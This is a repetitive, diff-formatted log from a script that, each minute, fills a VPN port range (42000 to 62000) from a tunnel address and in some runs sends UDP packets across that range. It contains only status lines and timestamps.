42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:11:05 +Starting port fill at 2020-09-06 08:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:12:07 +Starting port fill at 2020-09-06 08:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:13:06 +Starting port fill at 2020-09-06 08:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:14:07 +Starting port fill at 2020-09-06 08:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:15:07 +Starting port fill at 2020-09-06 08:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:16:06 +Starting port fill at 2020-09-06 08:17:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:17:05 +Starting port fill at 2020-09-06 08:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:18:04 +Starting port fill at 2020-09-06 08:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:19:05 +Starting port fill at 2020-09-06 08:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:20:04 +Starting port fill at 2020-09-06 08:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:21:05 +Starting port fill at 2020-09-06 08:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:22:04 +Starting port fill at 2020-09-06 08:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:23:04 +Starting port fill at 2020-09-06 08:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:24:04 +Starting port fill at 2020-09-06 08:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:25:04 +Starting port fill at 2020-09-06 08:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:26:04 +Starting port fill at 2020-09-06 08:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:27:04 +Starting port fill at 2020-09-06 08:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:28:05 +Starting port fill at 2020-09-06 08:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:29:04 +Starting port fill at 2020-09-06 08:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:30:05 +Starting port fill at 2020-09-06 08:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:31:07 +Starting port fill at 2020-09-06 08:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:32:06 +Starting port fill at 2020-09-06 08:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:33:05 +Starting port fill at 2020-09-06 08:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:34:05 +Starting port fill at 2020-09-06 08:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:35:07 +Starting port fill at 2020-09-06 08:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 